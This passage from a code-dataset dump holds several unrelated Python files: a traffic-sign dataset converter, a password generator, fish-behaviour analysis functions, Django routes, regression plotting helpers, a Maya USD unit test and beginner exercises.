default='E:/dataset/tt100k_2021/data/dataset/annotations/train.json',\n type=str, help=\"input: coco format(json)\")\n # 这里设置.txt文件保存位置\n parser.add_argument('--save_path', default='E:/dataset/tt100k_2021/data/dataset/annotations/', type=str,\n help=\"specify where to save the output dir of labels\")\n arg = parser.parse_args()\n\n\n def convert(size, box):\n dw = 1. / (size[0])\n dh = 1. / (size[1])\n x = box[0] + box[2] / 2.0\n y = box[1] + box[3] / 2.0\n w = box[2]\n h = box[3]\n # round函数确定(xmin, ymin, xmax, ymax)的小数位数\n x = round(x * dw, 6)\n w = round(w * dw, 6)\n y = round(y * dh, 6)\n h = round(h * dh, 6)\n return (x, y, w, h)\n\n # class_json = 'train'\n json_file = os.path.join(\n 'E:/dataset/tt100k_2021/data/dataset/annotations/%s.json' % class_json) # COCO Object Instance 类型的标注\n # ana_txt_save_path = 'D:/jinxData/TT100K/data/dataset/annotations/train' # 保存的路径\n ana_txt_save_path = os.path.join('E:/dataset/tt100k_2021/data/dataset/annotations', class_json) # 保存的路径\n\n data = json.load(open(json_file, 'r'))\n if not os.path.exists(ana_txt_save_path):\n os.makedirs(ana_txt_save_path)\n\n id_map = {} # coco数据集的id不连续!重新映射一下再输出!\n with open(os.path.join(ana_txt_save_path, 'classes.txt'), 'w') as f:\n # 写入classes.txt\n for i, category in enumerate(data['categories']):\n f.write(f\"{category['name']}\\n\")\n id_map[category['id']] = i\n # print(id_map)\n # 这里需要根据自己的需要,更改写入图像相对路径的文件位置。\n list_file = open(os.path.join(ana_txt_save_path, '%s.txt' % class_json.format()), 'w')\n for img in tqdm(data['images']):\n filename = img[\"file_name\"]\n img_width = img[\"width\"]\n img_height = img[\"height\"]\n img_id = img[\"id\"]\n head, tail = os.path.splitext(filename)\n ana_txt_name = head + \".txt\" # 对应的txt名字,与jpg一致\n f_txt = open(os.path.join(ana_txt_save_path, ana_txt_name), 'w')\n for ann in data['annotations']:\n if ann['image_id'] == img_id:\n box = convert((img_width, img_height), ann[\"bbox\"])\n f_txt.write(\"%s %s %s %s %s\\n\" % (id_map[ann[\"category_id\"]], box[0], box[1], box[2], box[3]))\n f_txt.close()\n # 将图片的相对路径写入train2017或val2017的路径\n list_file.write('/%s/%s.jpg\\n' % (class_json.format(), head))\n list_file.close()\n\n def divide_TrainValTest(self, source, target):\n '''\n 创建文件路径\n :param source: 源文件位置\n :param target: 目标文件位置\n '''\n for i in ['train', 'val', 'test']:\n path = target + '/' + i\n if not os.path.exists(path):\n os.makedirs(path)\n\n # 遍历目录下的文件名,复制对应的图片到指定目录\n for root, dirs, files in os.walk(source):\n for file in files:\n file_name = os.path.splitext(file)[0]\n image_path = os.path.join(file_name + '.jpg')\n # print(source)\n if 'train' in source:\n shutil.copyfile('E:/dataset/tt100k_2021/image_reparation/'\n + image_path, target + '/train/' + image_path)\n elif 'val' in source:\n shutil.copyfile('E:/dataset/tt100k_2021/image_reparation/'\n + image_path, target + '/val/' + image_path)\n elif 'test' in source:\n shutil.copyfile('E:/dataset/tt100k_2021/image_reparation/'\n + image_path, target + '/test/' + image_path)\n\n def xml2txt(self):\n # coding:utf-8\n\n parser = argparse.ArgumentParser()\n # xml文件的地址,根据自己的数据进行修改 xml一般存放在Annotations下\n parser.add_argument('--xml_path', default='xml', type=str, help='input xml label path')\n # 数据集的划分,地址选择自己数据下的ImageSets/Main\n parser.add_argument('--txt_path', default='dataSet', type=str, help='output txt label path')\n opt = parser.parse_args()\n\n trainval_percent = 1.0\n train_percent = 0.9\n xmlfilepath = opt.xml_path\n txtsavepath = opt.txt_path\n total_xml = os.listdir(xmlfilepath)\n if not os.path.exists(txtsavepath):\n os.makedirs(txtsavepath)\n\n num = len(total_xml)\n list_index = range(num)\n tv = int(num * trainval_percent)\n tr = int(tv * train_percent)\n trainval = random.sample(list_index, tv)\n train = random.sample(trainval, tr)\n\n file_trainval = open(txtsavepath + '/trainval.txt', 'w')\n file_test = open(txtsavepath + '/test.txt', 'w')\n file_train = open(txtsavepath + '/train.txt', 'w')\n file_val = open(txtsavepath + '/val.txt', 'w')\n\n for i in list_index:\n name = total_xml[i][:-4] + '\\n'\n if i in trainval:\n file_trainval.write(name)\n if i in train:\n file_train.write(name)\n else:\n file_val.write(name)\n else:\n file_test.write(name)\n\n file_trainval.close()\n file_train.close()\n file_val.close()\n file_test.close()\n\n\nif __name__ == '__main__':\n tt100k = TT100K2COCO()\n #tt100k.class_statistics()\n #tt100k.original_datasets2object_datasets_re()\n #tt100k.coco_json2yolo_txt('train')\n #tt100k.coco_json2yolo_txt('test')\n #tt100k.coco_json2yolo_txt('val')\n\n tt100k.divide_TrainValTest('E:/dataset/tt100k_2021/data/dataset/annotations/val', 'E:/dataset/tt100k_2021/data')\n","repo_name":"Truoji/yolov5s-jtbz-npu","sub_path":"jtbz/tt100k2yolo.py","file_name":"tt100k2yolo.py","file_ext":"py","file_size_in_byte":26182,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"}
+{"seq_id":"27089620979","text":"import string\nimport random\n\nprint('\\n Gerador de senhas \\n')\ns1 = list(string.ascii_lowercase)\ns2 = list(string.ascii_uppercase)\ns3 = list(string.digits)\ns4 = list(string.punctuation)\n\nwhile True:\n try:\n escolha_usuario = int(input('Digite o tamanho da senha: '))\n quantidade_caracteres = int(escolha_usuario)\n print('Escolha uma opcao: ')\n print('1-Senha basica')\n print('2-Senha forte')\n print('3-Mais informacoes')\n escolha_usuario2 = int(input(''))\n if escolha_usuario2 == 3:\n print('Senha basica: Letras maiusculas, minusculas e numeros')\n print('Senha Forte: Letras maiusculas e minusculas, numeros e simbolos')\n escolha_usuario2 = int(input('Agora escolha uma opcao: '))\n elif escolha_usuario2 > 3 or escolha_usuario2 < 1:\n print('Opcao invalida')\n escolha_usuario2 = int(input('Escolha uma opcao valida: '))\n \n\n if quantidade_caracteres < 5:\n print('A senha deve ter no minimo 5 caracter')\n escolha_usuario = int(input('Digite o tamanho da senha: '))\n elif quantidade_caracteres > 52:\n print('A senha nao pode ter mais de 52 caracteres')\n escolha_usuario = int(input('Digite o tamanho da senha: '))\n else:\n break\n except ValueError:\n print('Digite apenas numeros')\n\ndef senha_basica():\n random.shuffle(s1)\n random.shuffle(s2)\n part1 = round(quantidade_caracteres * (40/100))\n part2 = round(quantidade_caracteres * (40/100))\n part3 = round(quantidade_caracteres * (20/100))\n\n resultado = []\n for x in range(part1):\n resultado.append(s1[x])\n \n for x in range(part2):\n resultado.append(s2[x])\n\n for x in range(part3):\n resultado.append(s3[x])\n \n random.shuffle(resultado)\n senha = ''.join(resultado)\n print(f'Senha gerada: {senha}')\n\n\ndef senha_forte():\n #emabralhar tudo\n random.shuffle(s1)\n random.shuffle(s2)\n random.shuffle(s3)\n random.shuffle(s4)\n\n part1 = round(quantidade_caracteres * (30/100))\n part2 = round(quantidade_caracteres * (20/100))\n\n resultado = []\n for x in range(part1):\n resultado.append(s1[x])\n resultado.append(s2[x])\n\n for x in range(part2):\n resultado.append(s3[x])\n resultado.append(s4[x])\n\n random.shuffle(resultado)\n senha = ''.join(resultado)\n print(f'Senha gerada: {senha}')\n\n\nif escolha_usuario2 == 1:\n senha_basica()\nelif escolha_usuario2 == 2:\n senha_forte()","repo_name":"CaueConte/gerador-de-senhas","sub_path":"codigo.py","file_name":"codigo.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"34555640660","text":"import numpy as np\nimport pandas as pd\n\nfrom cichlidanalysis.analysis.processing import threshold_data\n\n\ndef find_bout_start_ends(bout_array):\n \"\"\" Takes a np.array of zeros and ones and determines the start/stop of the one streches. Assumes no NaNs.\n\n :param bout_array:\n :return: bout_start_t, bout_end_t\n \"\"\"\n # test that the array has no NaNs\n if max(np.isnan(bout_array)):\n print(\"NaN in bout_array therefore cannot run bout_speeds\")\n return False\n else:\n # determine bout starts and finishes\n changes = np.diff(bout_array, axis=0)\n\n # added 1 to active_bout_start as otherwise it is the last timepoint that was below the threshold.\n # Also did it to ends so a peak of one timepoint would have a length of 1.\n bout_start = np.asarray(np.where(changes == 1)) + 1\n bout_end = np.asarray(np.where(changes == -1)) + 1\n\n # determine if array started with a bout\n if bout_array[0] == 1:\n # first bout is ongoing, remove first bout as it is incomplete\n bout_start_t = bout_start[0, ]\n bout_end_t = bout_end[0, 1:]\n else:\n # take all starts (and ends)\n bout_start_t = bout_start[0, ]\n bout_end_t = bout_end[0, ]\n\n # remove incomplete bouts (e.g. those that do not end), in this case there will be one less end than start\n if bout_start_t.shape != bout_end_t.shape:\n if bout_start_t.shape > bout_end_t.shape:\n bout_start_t = bout_start_t[0:-1]\n else:\n print(\"something weird with number of bouts?\")\n return False\n\n # determine active inter-bout interval\n bout_lengths = bout_end_t - bout_start_t\n\n return bout_start_t, bout_end_t, bout_lengths\n\n\ndef find_bout_start_ends_inclusive(bout_array):\n \"\"\" Takes a np.array of zeros and ones and determines the start/stop of the one streches. Assumes no NaNs.\n Includes streches which are at the edge\n\n :param bout_array:\n :return: bout_start, bout_end\n \"\"\"\n # test that the array has no NaNs\n if max(np.isnan(bout_array)):\n print(\"NaN in bout_array therefore cannot run bout_speeds\")\n return False\n else:\n # determine bout starts and finishes\n changes = np.diff(bout_array, axis=0)\n\n # added 1 to active_bout_start as otherwise it is the last timepoint that was below the threshold.\n # Also did it to ends so a peak of one timepoint would have a length of 1.\n bout_start = (np.asarray(np.where(changes == 1)) + 1)[0]\n bout_end = (np.asarray(np.where(changes == -1)) + 1)[0]\n\n # determine if array ends with a bout\n if bout_array[-1] == 1:\n # if so add in a end\n bout_end = np.concatenate((bout_end, np.array([len(bout_array)])), axis=0)\n\n # determine if array started with a bout\n if bout_array[0] == 1:\n # first bout is ongoing, add first bout as it is incomplete\n bout_start = np.concatenate((np.array([0]), bout_start), axis=0)\n\n return bout_start, bout_end\n\n\ndef bout_speeds(bout_array, speed):\n \"\"\" For each bout (1 in array, not a zero, assumes no NaNs in data), find the speed of that bout\n :param bout_array:\n :param speed:\n :return: speed_active, bout_max, bout_speed\n \"\"\"\n # test that the array has no NaNs\n if max(np.isnan(bout_array)):\n print(\"NaN in bout_array therefore cannot run bout_speeds\")\n return False\n else:\n # find global speed within active bouts\n speed_active = speed[bout_array > 0.5]\n\n # find bout starts, ends and lengths\n bout_start, bout_end, bout_lengths = find_bout_start_ends(bout_array)\n bout_number = bout_start.shape[0]\n\n # for every bout, find the max speed\n bout_max = np.zeros(bout_start.shape[0])\n for bout_n in np.linspace(0, bout_number - 1, bout_number):\n bout_max[int(bout_n)] = np.max(speed[bout_start[int(bout_n)]:(bout_start[int(bout_n)] + bout_lengths[int(bout_n)])])\n\n return speed_active, bout_max\n\n\ndef triggered_bout_speed(bout_array, speed, pre, post):\n \"\"\" for every bout extract the speed \"pre\" time points before to \"post\" time points after.\n :param bout_array\n :param speed\n :param pre\n :param post\n :return: trig_bout_spd\n \"\"\"\n # test that the array has no NaNs\n if max(np.isnan(bout_array)):\n print(\"NaN in bout_array therefore cannot run bout_speeds\")\n return False\n else:\n # find bout starts, ends and lengths\n bout_start, bout_end, bout_lengths = find_bout_start_ends(bout_array)\n bout_number = bout_start.shape[0]\n\n # for every bout extract the speed \"pre\" time points before to \"post\" time points after.\n trig_bout_spd = np.empty([bout_start.shape[0], np.max(bout_lengths)]) # max(bout_lengths)+15]) # fps*10])\n trig_bout_spd[:] = np.nan\n\n for bout in np.linspace(0, bout_number - 1, bout_number):\n # extract out speed data from \"pre\" time points before to \"post\" time points after.\n if ((bout_start[int(bout)] - pre) > 0) & ((bout_start[int(bout)] + post) < speed.shape[0]):\n trig_bout_spd[int(bout), 0:(pre + post)] = (speed[(bout_start[int(bout)] - pre):(bout_start[int(bout)]\n + post)]).reshape(pre + post)\n\n return trig_bout_spd\n\n\ndef find_bouts(speed, threshold):\n \"\"\" Finds active and quiescent bouts, including where they start, how long they are etc\n :param speed (smoothed)\n :param threshold: speed threshold to determine active/quiescent\n :return: active_bout_lengths, active_bout_end_t, active_bout_start_t, quiescent_bout_lengths, quiescent_bout_end_t,\n quiescent_bout_start_t, active_bout_max\n\n assume no NaNs??\n \"\"\"\n # improvements to do: deal with nans in the middle of data\n # one way to do that would be to break apart blocks at NaNs. So there would be a loop to add in uninterrupted blocks\n # need to keep track and accumulate blocks in same category (e.g. night)\n\n active_indices = threshold_data(speed, threshold)\n inactive_indices = (active_indices != 1) * 1\n\n # for active\n active_bout_start, active_bout_end, active_bout_lengths = find_bout_start_ends(active_indices)\n active_speed, active_bout_max = bout_speeds(active_indices, speed)\n\n # for inactive\n inactive_bout_start, inactive_bout_end, inactive_bout_lengths = find_bout_start_ends(inactive_indices)\n inactive_speed, inactive_bout_max = bout_speeds(inactive_indices, speed)\n\n return active_bout_lengths, active_bout_end, active_bout_start, inactive_bout_lengths, inactive_bout_end, \\\n inactive_bout_start, active_speed, active_bout_max, active_indices, inactive_speed, inactive_bout_max, \\\n inactive_indices\n\n\ndef find_bout_start_ends_pd(bout_array):\n \"\"\" Takes a np.array of zeros and ones and determines the start/stop of the one streches. Assumes no NaNs.\n\n :param bout_array:\n :return: bout_start_t, bout_end_t\n \"\"\"\n # test that the array has no NaNs\n if max(np.isnan(bout_array)):\n print(\"NaN in bout_array therefore cannot run find_bout_start_ends_pd\")\n return False\n else:\n # determine bout starts and finishes\n changes = np.diff(bout_array, axis=0)\n\n # added 1 to active_bout_start as otherwise it is the last timepoint that was below the threshold.\n # Also did it to ends so a peak of one timepoint would have a length of 1.\n bout_start = np.asarray(np.where(changes == 1)) + 1\n bout_end = np.asarray(np.where(changes == -1)) + 1\n\n # determine if array started with a bout\n if bout_array[0] == 1:\n # first bout is ongoing, remove first bout as it is incomplete\n bout_start_t = bout_start[0, ]\n bout_end_t = bout_end[0, 1:]\n else:\n # take all starts (and ends)\n bout_start_t = bout_start[0, ]\n bout_end_t = bout_end[0, ]\n\n # remove incomplete bouts (e.g. those that do not end), in this case there will be one less end than start\n if bout_start_t.shape != bout_end_t.shape:\n if bout_start_t.shape > bout_end_t.shape:\n bout_start_t = bout_start_t[0:-1]\n else:\n print(\"something weird with number of bouts?\")\n return False\n\n # determine active inter-bout interval\n bout_lengths = bout_end_t - bout_start_t\n\n return bout_start_t, bout_end_t, bout_lengths\n\n\ndef find_bouts_input(fish_tracks_i, change_times_m, measure='rest'):\n \"\"\" Finds active and inactive bouts, including where they start, how long they are etc\n :param fish_tracks_i:\n :param measure: what to measure in the fish_tracks\n :return: fish_bouts: a dataframe with time stamps of start and ends of \"1\" or \"True\" bouts in the given data.\n \"\"\"\n fishes = fish_tracks_i['FishID'].unique()\n first = True\n\n for fish in fishes:\n all_bout_starts = pd.Series()\n all_bout_ends = pd.Series()\n\n # get individual fish\n fish_tracks_f = fish_tracks_i[fish_tracks_i.FishID == fish][['ts', measure]]\n\n # check if there are NaNs\n if np.max(np.isnan(fish_tracks_f.iloc[:, 1])):\n # break up NaN stretches\n non_nan_array = abs(((np.isnan(fish_tracks_f.iloc[:, 1])) * 1)-1)\n non_nan_array = non_nan_array.to_numpy()\n data_start, data_end = find_bout_start_ends_inclusive(non_nan_array)\n else:\n data_start, data_end = [0], [len(fish_tracks_f)]\n\n for strech_n in np.arange(0, len(data_start)):\n # calulate data stretches starts and ends\n data_stretch = fish_tracks_f.iloc[data_start[strech_n]:data_end[strech_n], 1]\n data_stetch_ts = fish_tracks_f.iloc[data_start[strech_n]:data_end[strech_n], 0]\n bout_start, bout_end, _ = find_bout_start_ends(data_stretch.to_numpy())\n # add the time stamps of found starts and ends to pd.Series\n all_bout_starts = pd.concat([all_bout_starts.reset_index(drop=True), data_stetch_ts.iloc[bout_start].\n reset_index(drop=True)])\n all_bout_ends = pd.concat([all_bout_ends.reset_index(drop=True), data_stetch_ts.iloc[bout_end].\n reset_index(drop=True)])\n\n # import matplotlib.pyplot as plt\n # plt.plot(fish_tracks_f.iloc[data_start[strech_n]:data_end[strech_n], 0], data_stretch)\n # plt.scatter(all_bout_starts, np.zeros([1, len(all_bout_starts)]), color='r')\n # plt.scatter(all_bout_ends, np.zeros([1, len(all_bout_starts)]), color='b')\n\n # find bout lengths for measure and nonmeasure\n all_bout_measure_lengths = all_bout_ends - all_bout_starts\n all_bout_nonmeasure_lengths = all_bout_starts.to_numpy()[1:] - all_bout_ends.to_numpy()[0:-1]\n\n # make fish_bouts df\n fish_bouts_i = pd.concat([all_bout_starts.reset_index(drop=True), all_bout_ends.reset_index(drop=True),\n all_bout_measure_lengths.reset_index(drop=True), pd.Series(all_bout_nonmeasure_lengths)],\n axis=1)\n fish_bouts_i.columns = ['bout_start', 'bout_end', measure + '_len', 'non' + measure + '_len']\n fish_bouts_i['FishID'] = fish\n\n # combine with the other fish\n if first:\n fish_bouts = fish_bouts_i\n first = False\n else:\n fish_bouts = pd.concat([fish_bouts, fish_bouts_i], axis=0)\n\n fish_bouts = fish_bouts.reset_index(drop=True)\n\n # add new column with Day or Night\n fish_bouts['time_of_day_m'] = fish_bouts.bout_start.apply(lambda row: int(str(row)[11:16][:-3]) * 60 +\n int(str(row)[11:16][-2:]))\n\n fish_bouts['daynight'] = \"d\"\n fish_bouts.loc[fish_bouts.time_of_day_m < change_times_m[0], 'daynight'] = \"n\"\n fish_bouts.loc[fish_bouts.time_of_day_m > change_times_m[3], 'daynight'] = \"n\"\n\n fish_bouts[\"bout_start\"].groupby(fish_bouts[\"bout_start\"].dt.hour).count().plot(kind=\"bar\")\n fish_bouts.loc[fish_bouts['FishID'] == fish, \"bout_start\"].groupby(fish_bouts[\"bout_start\"].dt.hour).count().plot(kind=\"bar\")\n\n return fish_bouts\n\n\ndef names_bouts():\n data_names = ['spd_mean', 'move_mean', 'rest_mean', 'y_mean', 'spd_std', 'move_std', 'rest_std', 'y_std',\n 'move_bout_mean', 'nonmove_bout_mean', 'rest_bout_mean', 'nonrest_bout_mean', 'move_bout_std',\n 'nonmove_bout_std', 'rest_bout_std', 'nonrest_bout_std']\n time_v2_m_names = ['predawn', 'dawn', 'day', 'dusk', 'postdusk', 'night']\n\n spd_means = ['spd_mean_predawn', 'spd_mean_dawn', 'spd_mean_day', 'spd_mean_dusk', 'spd_mean_postdusk',\n 'spd_mean_night']\n rest_means = ['rest_mean_predawn', 'rest_mean_dawn', 'rest_mean_day', 'rest_mean_dusk', 'rest_mean_postdusk',\n 'rest_mean_night']\n move_means = ['move_mean_predawn', 'move_mean_dawn', 'move_mean_day', 'move_mean_dusk', 'move_mean_postdusk',\n 'move_mean_night']\n rest_b_means = ['rest_bout_mean_predawn', 'rest_bout_mean_dawn', 'rest_bout_mean_day', 'rest_bout_mean_dusk',\n 'rest_bout_mean_postdusk', 'rest_bout_mean_night']\n nonrest_b_means = ['nonrest_bout_mean_predawn', 'nonrest_bout_mean_dawn', 'nonrest_bout_mean_day',\n 'nonrest_bout_mean_dusk',\n 'nonrest_bout_mean_postdusk', 'nonrest_bout_mean_night']\n move_b_means = ['move_bout_mean_predawn', 'move_bout_mean_dawn', 'move_bout_mean_day', 'move_bout_mean_dusk',\n 'move_bout_mean_postdusk', 'move_bout_mean_night']\n nonmove_b_means = ['nonmove_bout_mean_predawn', 'nonmove_bout_mean_dawn', 'nonmove_bout_mean_day',\n 'nonmove_bout_mean_dusk',\n 'nonmove_bout_mean_postdusk', 'nonmove_bout_mean_night']\n\n # movement_bouts = ['move_bout_mean', 'nonmove_bout_mean', 'move_bout_std']\n # rest_bouts = ['rest_bout_mean', 'nonrest_bout_mean']\n\n return data_names, time_v2_m_names, spd_means, rest_means, move_means, rest_b_means, nonrest_b_means, move_b_means, nonmove_b_means\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","repo_name":"annnic/cichlid-analysis","sub_path":"cichlidanalysis/analysis/bouts.py","file_name":"bouts.py","file_ext":"py","file_size_in_byte":14474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71202604488","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name=\"index\"),\n path('about/', views.about, name='about'),\n path('property/', views.proPerty, name=\"property\"),\n path('property_single', views.property, name=\"propertySingle\"),\n path('agents/', views.agent, name=\"agents\"),\n path('agents_single/', views.agentSingle, name=\"agentSinge\"),\n path('blog/', views.blog, name=\"blog\"),\n path('blog_single/', views.blogSingle, name=\"blogSingle\"),\n path('contact/', views.contact, name=\"contact\"),\n]","repo_name":"koueAnicet/immobilier","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"13820552981","text":"liczby = []\n\nwhile len(liczby) != 10:\n wpis = input(f'Podaj liczbe numer {len(liczby)+1}: ')\n if wpis == 'koniec':\n break\n else:\n liczby.append(float(wpis))\n\nprint(f'Srednia wartosc liczb to: {sum(liczby)/len(liczby)}')","repo_name":"konradmaleckipl/python_bootcamp_20180825","sub_path":"zjazd2/zad2.py","file_name":"zad2.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"pl","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"37115490394","text":"from matplotlib.ticker import PercentFormatter\r\nimport matplotlib.pyplot as plt\r\nimport statsmodels . api as sm\r\nimport pandas as pd\r\nimport os\r\nimport numpy as np\r\ndef plotbar(P,string):\r\n for e in P:\r\n plt.bar(e[0],e[1])\r\n plt.xticks(rotation=90)\r\n plt.savefig(\"TEST\"+string+\".png\")\r\n\r\ndef plotCAPM(Stocks,Market,OLSResult,Subset,String):\r\n cwd = os.getcwd()\r\n folder = cwd + \"/img/testCAPM/\"\r\n\r\n if not os.path.exists(folder):\r\n os.mkdir(folder)\r\n myint=iter(Subset.columns)\r\n for e,OLSRes in zip(Stocks,OLSResult):\r\n str=next(myint).strip()\r\n plt.figure()\r\n plt.plot(Market, OLSRes.iloc[1][0]*Market+OLSRes.iloc[0][1])\r\n plt.scatter(Market,e)\r\n plt . xlabel ('Eurostoxx')\r\n plt . ylabel (str)\r\n plt.savefig(\"img/testCAPM/CAPM-\"+str+String+\".png\")\r\n plt.close()\r\n\r\n\r\ndef plotscatter(setx,sety,title,xlabel,ylabel,sigla,Subset,string_to_save):\r\n cwd = os.getcwd()\r\n folder = cwd + \"/\"+string_to_save\r\n\r\n if not os.path.exists(folder):\r\n os.mkdir(folder)\r\n \r\n myint=iter(Subset.columns)\r\n for e in sety:\r\n str=next(myint)\r\n plt.figure()\r\n plt.scatter(setx,e)\r\n plt.title(title)\r\n plt . xlabel (xlabel)\r\n plt . ylabel (str+ylabel)\r\n plt.savefig(folder+\"/\"+sigla+\"-\"+str+\".png\")\r\n plt.close()\r\n \r\n\r\n\r\ndef OLS(Stock_Risk_Free,Market,printSummary=False):\r\n Res= []\r\n X = np . column_stack (( np . ones_like ( Market ) , Market ))\r\n try:\r\n Stock_Risk_Free.shape[1]\r\n for e,i in zip(Stock_Risk_Free,range(0,len(Stock_Risk_Free))):\r\n df = sm . OLS ( e[1:] , X[1:] ). fit ()\r\n Res.append(pd.read_html(df.summary().tables[1].as_html(),header=0,index_col=0)[0])\r\n if printSummary:\r\n with open('summary'+str(i)+'.txt', 'w') as fh:\r\n fh.write(df.summary().as_html())\r\n except:\r\n Res.append(pd.read_html(sm . OLS ( Stock_Risk_Free[1:], X[1:] ). fit ().summary().tables[1].as_html(),header=0,index_col=0)[0])\r\n \r\n \r\n return Res\r\n\r\ndef ReorderByOLSParam(Stocks,Subset,Row_interess,Coloum_interess):\r\n \"\"\"\r\n Function return stock reorder by OLS result\r\n Row_interess -> choose row of OLS Summary between\r\n Const=0, X1=1\r\n\r\n Coloum_interess-> choose coloum of OLS summary between\r\n coef=0 std err=1 t=2 P>|t|=3 0.025=4 0.975=5 \r\n \"\"\" \r\n P = {}\r\n myint=iter(Subset.columns)\r\n for e in Stocks:\r\n P[next(myint)]=e.iloc[Row_interess][Coloum_interess]\r\n return sorted(P.items(), key=lambda x:x[1])\r\n","repo_name":"RiccardoForni/Regression_Project","sub_path":"Project - Mazzolin, Forni, Dian, Lavarello/Regre_Function.py","file_name":"Regre_Function.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"34331953708","text":"import fixturesUtils\nimport mayaUtils\nimport testUtils\nimport ufeUtils\n\nfrom maya import cmds\nfrom maya import standalone\n\nimport ufe\n\nimport os\nimport unittest\n\nclass SceneSegmentTestCase(unittest.TestCase):\n '''Verify the Scene Segment UFE interface, for multiple runtimes.\n \n UFE Feature : ProxyShape, stage nesting\n Maya Feature : ProxyShape\n Action : query scene segments\n '''\n\n pluginsLoaded = False\n \n @classmethod\n def setUpClass(cls):\n fixturesUtils.readOnlySetUpClass(__file__, loadPlugin=False)\n\n if not cls.pluginsLoaded:\n cls.pluginsLoaded = mayaUtils.isMayaUsdPluginLoaded()\n\n @classmethod\n def tearDownClass(cls):\n standalone.uninitialize()\n\n def setUp(self):\n ''' Called initially to set up the maya test environment '''\n # Load plugins\n self.assertTrue(self.pluginsLoaded)\n\n # load the file and get ready to test!\n cmds.file(force=True, new=True)\n mayaUtils.loadPlugin(\"mayaUsdPlugin\")\n testFile = testUtils.getTestScene(\"camera\", 'TranslateRotate_vs_xform.usda')\n mayaUtils.createProxyFromFile(testFile)\n globalSelection = ufe.GlobalSelection.get()\n globalSelection.clear()\n\n def testProxyShapeSceneSegmentHandler(self):\n proxyShapePath = ufe.PathString.path('|stage|stageShape')\n proxyShapeParentPath = ufe.PathString.path('|stage')\n camerasParentPath = ufe.PathString.path('|stage|stageShape,/cameras')\n\n # searching on a gateway item should give all gateway nodes in the child segment.\n # USD doesn't have any gateway nodes, so the result should be empty\n handler = ufe.RunTimeMgr.instance().sceneSegmentHandler(proxyShapePath.runTimeId())\n result = handler.findGatewayItems(proxyShapePath)\n self.assertTrue(result.empty())\n\n # searching the the parent of a gateway item searches the Maya scene segment\n # for gateway nodes without recursing into USD. should be the proxy shape\n handler = ufe.RunTimeMgr.instance().sceneSegmentHandler(proxyShapeParentPath.runTimeId())\n result = handler.findGatewayItems(proxyShapeParentPath)\n self.assertTrue(result.contains(proxyShapePath))\n self.assertEqual(len(result), 1)\n\n # searching for the USD parent of both cameras should find no scene segment handler\n handler = ufe.RunTimeMgr.instance().sceneSegmentHandler(camerasParentPath.runTimeId())\n self.assertEqual(handler, None)\n\n @unittest.skipUnless(ufeUtils.ufeFeatureSetVersion() >= 4, 'Test for UFE v4 or later')\n def testFilteredFindGatewayItems(self):\n proxyShapePath = ufe.PathString.path('|stage|stageShape')\n proxyShapeParentPath = ufe.PathString.path('|stage')\n\n # Searching on a gateway item should give all gateway nodes in\n # the child segment. USD doesn't have any gateway nodes, so the\n # result should be empty. When using the filtered version of\n # `findGatewayItems()`, the result should still be empty.\n # Filtering can never increase the cardinality of the result.\n handler = ufe.RunTimeMgr.instance().sceneSegmentHandler(proxyShapePath.runTimeId())\n \n result = handler.findGatewayItems(proxyShapePath)\n self.assertTrue(result.empty())\n\n usdRunTimeId = ufe.RunTimeMgr.instance().getId('USD')\n result = handler.findGatewayItems(proxyShapePath, usdRunTimeId)\n self.assertTrue(result.empty())\n\n otherRunTimeId = 6174\n result = handler.findGatewayItems(proxyShapePath, otherRunTimeId)\n self.assertTrue(result.empty())\n\n # Searching from the parent of a gateway item searches the Maya\n # scene segment for gateway nodes without recursing into USD.\n # If no filter is specified or if the USD runtime ID is used as\n # a filter, this should return the proxy shape. If a different\n # runtime ID is used as a filter, the result should be empty.\n handler = ufe.RunTimeMgr.instance().sceneSegmentHandler(proxyShapeParentPath.runTimeId())\n \n result = handler.findGatewayItems(proxyShapeParentPath)\n self.assertTrue(result.contains(proxyShapePath))\n self.assertEqual(len(result), 1)\n\n result = handler.findGatewayItems(proxyShapeParentPath, usdRunTimeId)\n self.assertTrue(result.contains(proxyShapePath))\n self.assertTrue(len(result), 1)\n\n result = handler.findGatewayItems(proxyShapeParentPath, otherRunTimeId)\n self.assertTrue(result.empty())\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","repo_name":"Autodesk/maya-usd","sub_path":"test/lib/ufe/testSceneSegment.py","file_name":"testSceneSegment.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","stars":690,"dataset":"github-code","pt":"16"}
+{"seq_id":"39242594256","text":"prompt = (\"\\nPlease state your message\")\nprompt += \"\\n(or enter 'quit' to move on.): \"\n\n# message = \"\"\n# while message != 'quit':\n# message = input(prompt)\n\n# if message != 'quit':\n# print(message)\n\n#using a flag\nactive = True\nwhile active:\n message = input(prompt)\n\n if message == 'quit':\n active = False\n else:\n print(message)\n\n#using break to exit a loop\nprompt = (\"\\nPlease enter food you'd like to order\")\nprompt += \"\\n(or enter 'quit' to end program.): \"\n\nwhile True:\n food = input(prompt)\n\n if food == 'quit':\n break\n else: \n print (f\"We will have your {food.upper()} ready in the next 15 minutes\")","repo_name":"hanna1cho/python_crash_course","sub_path":"input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
